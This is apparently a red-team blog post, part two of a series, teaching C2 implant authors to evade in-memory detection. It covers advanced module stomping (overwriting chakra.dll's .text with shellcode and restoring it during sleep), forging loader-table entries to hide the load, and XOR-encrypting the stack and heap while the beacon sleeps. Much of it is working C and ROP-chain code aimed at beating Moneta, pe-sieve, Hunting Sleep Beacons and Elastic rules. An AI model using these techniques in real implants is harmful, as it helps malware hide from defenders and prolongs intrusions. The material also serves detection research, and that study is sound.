Evading detection in memory - Pt 2: Improving Module Stomping (Advanced Module Stomping) + Sleep Obfuscation with heap/stack encryption
In this chapter we will cover module stomping, another approach that helps against memory detection. We will also talk about its IOCs and how to improve the technique.
As mentioned in the previous blog post, Evading detection in memory - Pt 1: Sleep Obfuscation - Foliage, memory detections focus on private RX memory regions and the thread’s call stack.
The Module Stomping technique involves overwriting the RX (read-execute) memory region of a DLL loaded in memory with shellcode, with the goal of evading detection based on private memory analysis. This method also avoids concerns about the call stack, as the shellcode is executed from a memory region that is backed by a module. However, a challenge with this process is that, when using sRDI (Shellcode Reflective DLL Injection) C2 beacons, the memory content will be reflected into a new region, causing an overwrite of a legitimate DLL area. This results in visible modifications, which can be easily detected, generating IOCs (Indicators of Compromise).
The solution to this problem involves using a reflective loader in conjunction with the implant. In my case, I’ll use a shellcode that doesn’t reflect. However, even with this approach, the overwritten memory area can still be noticed. To enhance this technique and reduce the likelihood of detection, we propose the following process:
- Allocate Mapped RW Memory: First, we allocate two Mapped RW memory regions, called Memory Mapped A and Memory Mapped B.
- Backup the DLL: We back up the DLL that will be overwritten by storing it in Memory Mapped A, so that the integrity of the original DLL can be preserved later.
- Write the Beacon: The beacon (shellcode) is then written into Memory Mapped B, a secure memory area for the payload.
- Stomp the text section with the shellcode implant: We load the DLL using LoadLibraryEx, passing DONT_RESOLVE_DLL_REFERENCES, and overwrite the text section of the module.
- Restore During “Sleep”: During the process’s “sleep” time (inactivity), the overwritten DLL is restored to its original position in memory from the backup in Memory Mapped A. This step ensures that while the beacon is inactive, the memory will appear legitimate, containing the original DLL data.
- Prepare for Execution: When it’s time to execute the beacon, the memory is overwritten again: the beacon is copied back from Memory Mapped B, replacing the restored DLL.
In this way, the DLL’s memory will appear legitimate during the beacon’s inactivity period, with a very brief window of visibility only during the beacon’s execution. This minimizes the chances of detection, as the memory changes occur only during the active execution phase and are quickly reverted once the beacon has finished executing.
Injection: Stomping
We will have a structure to store values to pass to our agent, containing information about the MAPPED memory for agent backup and the backup of the Stomped Module.
typedef struct _STOMP_ARGS {
    PVOID AgntBackup; // mapped backup of the agent
    PVOID ModBackup;  // mapped backup of the stomped module
} STOMP_ARGS, *PSTOMP_ARGS;
In the injection code, we will start with a simple POC by loading a DLL called chakra.dll. First, we will load it using the LoadLibraryEx API, passing DONT_RESOLVE_DLL_REFERENCES:
MmBase = Instance.Win32.LoadLibraryExA( "chakra.dll", NULL, DONT_RESOLVE_DLL_REFERENCES );
This way, the DllMain entrypoint of the DLL is not called, and it also does not resolve the IAT, as otherwise the loaded DLL could load other DLLs and start other threads, which we do not want while performing Module Stomping. The standard use of LoadLibraryEx is problematic for several reasons that we will discuss later.
We will parse the DLL header to find its .text section.
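SecHdr = IMAGE_FIRST_SECTION( Header );

// walk the section table until we reach .text
for ( ULONG i = 0; i < Header->FileHeader.NumberOfSections; i++, SecHdr++ ) {
    // strcmp returns 0 on a match
    if ( strcmp( C_PTR( SecHdr->Name ), ".text" ) == 0 ) {
        break;
    }
}

// SecHdr now points at the .text section header
MmBase = C_PTR( (UINT64)( MmBase ) + SecHdr->VirtualAddress );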
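One detail worth keeping in mind when matching section names: in the PE format the name is a fixed 8-byte field that is padded with NULs and is not NUL-terminated when the name uses all 8 bytes. The following is a minimal, portable sketch of a bounded lookup. The `SectionHeader` struct and `find_section` function are hypothetical stand-ins written for illustration (they only mirror the `Name` and `VirtualAddress` fields of `IMAGE_SECTION_HEADER`) and are not part of the original code.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SECTION_NAME_LEN 8

/* Hypothetical stand-in for the two IMAGE_SECTION_HEADER fields used here. */
typedef struct {
    uint8_t  Name[SECTION_NAME_LEN]; /* NUL-padded, not always NUL-terminated */
    uint32_t VirtualAddress;
} SectionHeader;

/* Returns the first section whose name equals `name`, or NULL if none does. */
static const SectionHeader *find_section(const SectionHeader *sections,
                                         size_t count, const char *name)
{
    size_t len = strlen(name);
    if (len > SECTION_NAME_LEN) {
        return NULL; /* cannot be a valid section name */
    }

    /* Build the 8-byte, NUL-padded form of the wanted name once. */
    uint8_t wanted[SECTION_NAME_LEN] = { 0 };
    memcpy(wanted, name, len);

    for (size_t i = 0; i < count; i++) {
        /* Comparing the whole field never reads past an 8-character name. */
        if (memcmp(sections[i].Name, wanted, SECTION_NAME_LEN) == 0) {
            return &sections[i];
        }
    }
    return NULL;
}
```

Returning NULL when nothing matches lets the caller stop early instead of using whatever header the loop happened to end on.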
Now, we will create backups of the Agent and the Module using MAPPED memory.
// one pagefile-backed section of StompArgs.Length bytes
hFile = Instance.Win32.CreateFileMappingA(
    INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE,
    0, StompArgs.Length, NULL
);

// note: both views map offset 0 of the same section, so they refer to the
// same underlying memory; use a separate mapping per backup if the two
// backups must hold different data
StompArgs.Backup = Instance.Win32.MapViewOfFile(
    hFile, FILE_MAP_WRITE | FILE_MAP_READ,
    0, 0, StompArgs.Length
);

StompArgs.Backup2 = Instance.Win32.MapViewOfFile(
    hFile, FILE_MAP_WRITE | FILE_MAP_READ,
    0, 0, StompArgs.Length
);
After changing the protection to RW, we will populate the module backup and write our shellcode to the .text section, then revert to the previous protection, and finally call the agent’s entry point (BlackoutMain in the code below), passing the structure as an argument.
// make the .text section writable
Instance.Win32.VirtualProtect( MmBase, SecHdr->SizeOfRawData, PAGE_READWRITE, &Protect );

// save the original module bytes, then overwrite them with the shellcode
MmCopy( StompArgs.ModBackup, MmBase, ShellcodeSize );
MmCopy( MmBase, ShellcodeBuffer, ShellcodeSize );
MmZero( ShellcodeBuffer, ShellcodeSize ); // this depends on the shellcode location

// restore the previous protection
bCheck = Instance.Win32.VirtualProtect( MmBase, SecHdr->SizeOfRawData, Protect, &Protect );
if ( !bCheck ) return;

Instance.Win32.BlackoutMain( &StompArgs );
Agent: SleepObf + Stomping
We will start the sleep obfuscation chain by changing the RX region’s protection to RW, then overwriting it with the module’s backup, reverting to RX, and then sleeping:
// 1. make the stomped region writable
RopProtRw.Rip = Gadget; // jmp rbx gadget
RopProtRw.Rbx = &Instance()->Win32.VirtualProtect;
RopProtRw.Rcx = Instance()->Base.RxBase;
RopProtRw.Rdx = Instance()->Base.FullLen; // region size (assumed to match the length used below)
RopProtRw.R8  = PAGE_READWRITE;
RopProtRw.R9  = &OldProt;

// 2. write the module backup over the region
RopModBcp.Rip = Instance()->Win32.WriteProcessMemory;
RopModBcp.Rcx = NtCurrentProcess();
RopModBcp.Rdx = Instance()->Base.Buffer;
RopModBcp.R8  = Instance()->StompArgs->ModBackup;
RopModBcp.R9  = Instance()->Base.FullLen;

// 3. revert the region to RX
RopProtRx.Rip = Gadget; // jmp rbx gadget
RopProtRx.Rbx = &Instance()->Win32.VirtualProtect;
RopProtRx.Rcx = Instance()->Base.Buffer;
RopProtRx.Rdx = Instance()->Base.FullLen;
RopProtRx.R8  = PAGE_EXECUTE_READ;
RopProtRx.R9  = &OldProt;

// 4. sleep
RopDelay.Rip = Instance()->Win32.WaitForSingleObjectEx;
RopDelay.Rcx = NtCurrentProcess();
RopDelay.Rdx = SleepTime;
RopDelay.R8  = FALSE;
Now let’s observe that the call stack appears legitimate.
Perspective from pe-sieve
Note: The interesting part is that if we don’t revert the module’s memory back to RX and leave it as RW, Moneta doesn’t detect it. However, this isn’t a recommended approach.
Perspective from moneta about not reverting memory to RX
Note: the “unsigned module” warning appears only because my .exe is not signed with a certificate.
Perspective from moneta about reverting memory to RX:
We encounter issues with Shareable Working Set and SharedOriginal. I was alerted to this after reading a blog post by Nigerald, which can be found in the last section of this blog post under “Reference and credits”. He explains them as follows:
- Shared Working Set is the number of bytes of memory that this particular page is using and is shared. To avoid wasting memory, some of it is shared. For example, ntdll is loaded into all processes and uses the same physical memory. If this shared memory is written to, the process gets a private copy of the memory page, using additional physical memory.
- SharedOriginal is a flag of a memory page that indicates whether this page is the original mapping. This flag is set to 0 when the page is written to, meaning it would be a copy of the original page, but modified.
Moneta flagged this due to these flags, so I developed a POC (Proof of Concept) to circumvent this. The idea is as follows:
- First, we allocate just one Mapped RW memory region for implant backup.
- Write to memory to create a backup of the implant content.
- During Sleep Obfuscation, we unload the loaded module and load a fresh instance of the same module without the corrupted image pages.
- Upon waking, restore the implant to the .text section and resume execution.
In this POC, I won’t go into detail about the injector as I believe it’s clear how to adapt it. Moving directly to the implant, we will proceed with:
RopFreeLb.Rip = Instance()->Win32.LdrUnloadDll;
RopFreeLb.Rcx = hLibraryFr;
RopLoadLb.Rip = Instance()->Win32.LoadLibraryExA;
RopLoadLb.Rcx = LibraryFr;
RopLoadLb.Rdx = NULL;
RopLoadLb.R8 = DONT_RESOLVE_DLL_REFERENCES;
These are the first two fragments of the chain, but we still have the issue with LoadLibraryExA, which is a bit worse in this implementation. Now it’s time to fix this and explain more about its problems.
When a module is loaded with the DONT_RESOLVE_DLL_REFERENCES flag, some of the values in its LDR_DATA_TABLE_ENTRY, located inside the LDR, are abnormal, as can be seen below:
This image was taken from the blog post BRC4 Release: Nightmare, which can be found in the “References and Credits” section. According to its author, the values represent the following:
- EntryPoint: The entry point for the module’s execution, where the DllMain address would be located.
- ImageDll: This means the DLL was loaded as an EXE rather than as a DLL.
- LoadNotificationsSent: This indicates that the loading notification for the DLL was not sent.
- ProcessStaticImport: This means the DLL’s imports were not processed.
I will create a simple piece of code to compare a DLL loaded with LoadLibraryA against a DLL loaded using LoadLibraryExA with the DONT_RESOLVE_DLL_REFERENCES flag. The result is shown below:
Note: When I examined other modules, and even the DLL loaded “normally,” the ProcessStaticImport member was marked as false, so I kept it as false in this case.
To fix this in the PEB, we have the following example code:
PLDR_DATA_TABLE_ENTRY Data   = NULL;
PLIST_ENTRY           Head   = &Instance()->Teb->ProcessEnvironmentBlock->Ldr->InLoadOrderModuleList;
PLIST_ENTRY           Entry  = Head->Flink;
PIMAGE_NT_HEADERS     NtHdrs = NULL;
UINT64                Ep     = 0;
HMODULE               Module = NULL;

// find the entry of the target module in the loader list
for ( ; Head != Entry ; Entry = Entry->Flink ) {
    Data = C_PTR( Entry );

    // BaseDllName is a UNICODE_STRING, so ModuleName is assumed to be a wide string here
    if ( wcscmp( Data->BaseDllName.Buffer, ModuleName ) == 0 ) {
        Module = Data->DllBase;
        break;
    }
}

NtHdrs = C_PTR( (PBYTE)( Module ) + ( (PIMAGE_DOS_HEADER)( Module ) )->e_lfanew );
Ep     = (UINT64)( Module ) + NtHdrs->OptionalHeader.AddressOfEntryPoint;

Data->EntryPoint            = C_PTR( Ep );
Data->Flags                 = 0x8a2cc;
Data->ImageDll              = 1;
Data->LoadNotificationsSent = 1;
Data->ProcessStaticImport   = 0;
We retrieve the module’s address, then parse it to obtain the AddressOfEntryPoint and pass it to PLDR_DATA_TABLE_ENTRY->EntryPoint. The other values will be set according to the screenshot above.
This time we will also include Hunting Sleep Beacons. Below we have our advanced module stomping vs memory scanners.
Moneta:
pe-sieve:
Hunting Sleep Beacons:
Heap/Stack Encryption - Plus
An important step in sleep obfuscation is to encrypt both the stack and the heap. Many pieces of information such as variables, function return addresses, etc., are stored in these areas at runtime.
Stack
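To obfuscate the stack, we need its base address and size. For this, we can use the TEB->NT_TIB.StackBase and TEB->NT_TIB.StackLimit values. Because the stack grows downward, StackBase is the highest address and StackLimit the lowest, so the size is the difference between the two. Once we have both values, we can pass them to an encryption/obfuscation function.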
PTEB  Teb        = NtCurrentTeb();
PVOID StackBase  = Teb->NtTib.StackBase;
PVOID StackLimit = Teb->NtTib.StackLimit;

XorStack( StackBase, StackLimit );
We use this function to obfuscate it:
FUNC VOID XorStack(
    PVOID StackBase,
    PVOID StackLimit
) {
    // walk from the limit (lowest address) up to the base (highest address)
    for ( PUCHAR Ptr = StackLimit; Ptr < (PUCHAR)( StackBase ); Ptr++ ) {
        *Ptr ^= 0xFF;
    }
}
Stack xor demo
You may want to run sleepobf in another thread so that it can xor the stack of the main beacon thread. Just be careful not to mess up the call stack.
Heap
When dealing with the heap, we need to be cautious. If we use the return value from GetProcessHeap or PEB->ProcessHeap, we will be using the main heap of the process. Other threads are almost certainly using the same heap, and if we obfuscate it, those threads will likely freeze, causing the process to crash. Another approach would be to enumerate all threads and suspend them, but I don’t like this idea, and I’m sure you understand why.
To solve this problem, we will create our own heap using RtlCreateHeap.
PVOID Heap = RtlCreateHeap( NULL, NULL, 0, 0, 0, NULL );
This way, we will have our own heap, and when we use functions like HeapAlloc and others, we will pass our custom heap.
Now, we need to enumerate the blocks and get their size. We can use HeapWalk, which fills in a PROCESS_HEAP_ENTRY structure on each call. The important members are lpData, which is the base address of the block, and cbData, which is the size of the heap block.
FUNC VOID HeapObf(
    PVOID Heap
) {
    BLACKOUT_INSTANCE

    PROCESS_HEAP_ENTRY HeapEntry   = { 0 };
    BYTE               HeapKey[16] = { 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55 }; // can be random generation

    MmZero( &HeapEntry, sizeof( PROCESS_HEAP_ENTRY ) );

    typedef WINBOOL (*fHeapWalk)(HANDLE hHeap, LPPROCESS_HEAP_ENTRY lpEntry);
    fHeapWalk pHeapWalk = LdrFuncAddr( LdrModuleAddr( H_MODULE_KERNEL32 ), HASH_STR( "HeapWalk" ) );

    // HeapWalk returns one entry per call, so loop until it reports no more entries
    while ( pHeapWalk( Heap, &HeapEntry ) ) {
        // only allocated (busy) blocks hold data
        if ( HeapEntry.wFlags & PROCESS_HEAP_ENTRY_BUSY ) {
            XorCipher( HeapEntry.lpData, HeapEntry.cbData, HeapKey, sizeof(HeapKey) );
        }
    }
}
Heap obfuscated demo
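The XorCipher helper called in HeapObf is not shown in this post. As a rough idea of what such a helper might look like, here is a minimal portable sketch that assumes it is a plain repeating-key XOR taking the same four arguments in the same order. The body and parameter names are assumptions for illustration, not the original implementation.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: XORs `size` bytes at `data` with a repeating key.
 * Calling it a second time with the same key restores the original bytes. */
static void XorCipher(void *data, size_t size, const uint8_t *key, size_t key_len)
{
    uint8_t *bytes = (uint8_t *)data;

    /* Nothing sensible to do without a buffer or a key. */
    if (bytes == NULL || key == NULL || key_len == 0) {
        return;
    }

    for (size_t i = 0; i < size; i++) {
        bytes[i] ^= key[i % key_len]; /* the key wraps around every key_len bytes */
    }
}
```

Because XOR is its own inverse, the same routine can serve both before and after the sleep, which is why a single call site with a fixed key is enough.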
Another approach that may be better than creating your own heap would be to create a wrapper function that allocates on the process’s own heap and puts every allocation in a linked list (PLIST_ENTRY), an idea originally from @bakki.
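To make the wrapper idea more concrete, here is a minimal portable sketch of allocation tracking with a doubly linked list. It uses malloc and free as stand-ins for the process heap, and every name in it (TrackedBlock, tracked_alloc, tracked_free, tracked_for_each, sum_sizes) is hypothetical. It only shows the bookkeeping, under the assumption that all allocations go through the wrapper from a single thread.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical header stored in front of each block; the union pads it so
 * the user data that follows keeps malloc's alignment. */
typedef union TrackedBlock {
    struct { union TrackedBlock *next, *prev; size_t size; } h;
    max_align_t align;
} TrackedBlock;

static TrackedBlock *g_blocks = NULL; /* head of the list of live blocks */

static void *tracked_alloc(size_t size)
{
    if (size > SIZE_MAX - sizeof(TrackedBlock)) return NULL;
    TrackedBlock *node = malloc(sizeof(TrackedBlock) + size);
    if (node == NULL) return NULL;

    node->h.size = size;
    node->h.prev = NULL;
    node->h.next = g_blocks;            /* push onto the front of the list */
    if (g_blocks) g_blocks->h.prev = node;
    g_blocks = node;
    return node + 1;                    /* user data starts after the header */
}

static void tracked_free(void *ptr)
{
    if (ptr == NULL) return;
    TrackedBlock *node = (TrackedBlock *)ptr - 1;

    /* Unlink the node before releasing it. */
    if (node->h.prev) node->h.prev->h.next = node->h.next;
    else              g_blocks = node->h.next;
    if (node->h.next) node->h.next->h.prev = node->h.prev;
    free(node);
}

typedef void (*BlockVisitor)(void *data, size_t size, void *ctx);

/* Calls `visit` once for every live block with its data pointer and size. */
static void tracked_for_each(BlockVisitor visit, void *ctx)
{
    for (TrackedBlock *n = g_blocks; n != NULL; n = n->h.next) {
        visit(n + 1, n->h.size, ctx);
    }
}

/* Example visitor: adds each block size to the size_t that ctx points to. */
static void sum_sizes(void *data, size_t size, void *ctx)
{
    (void)data;
    *(size_t *)ctx += size;
}
```

The point of the list is that only the blocks the wrapper handed out are ever visited, so memory owned by other threads on the same heap is left alone.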
Observation
There are some improvements that could be made here, such as compile-time string encryption, obfuscating backup regions, using indirect syscalls, etc., but we’re focusing solely on memory evasion for now. We still need to bypass the Elastic rule I mentioned in the previous blog post Evading detection in memory - Pt 1: Sleep Obfuscation - Foliage.
I’m developing a custom agent for the Havoc C2 Framework, which will feature some of these even more sophisticated techniques and will be open source. I’ll share more about this project soon.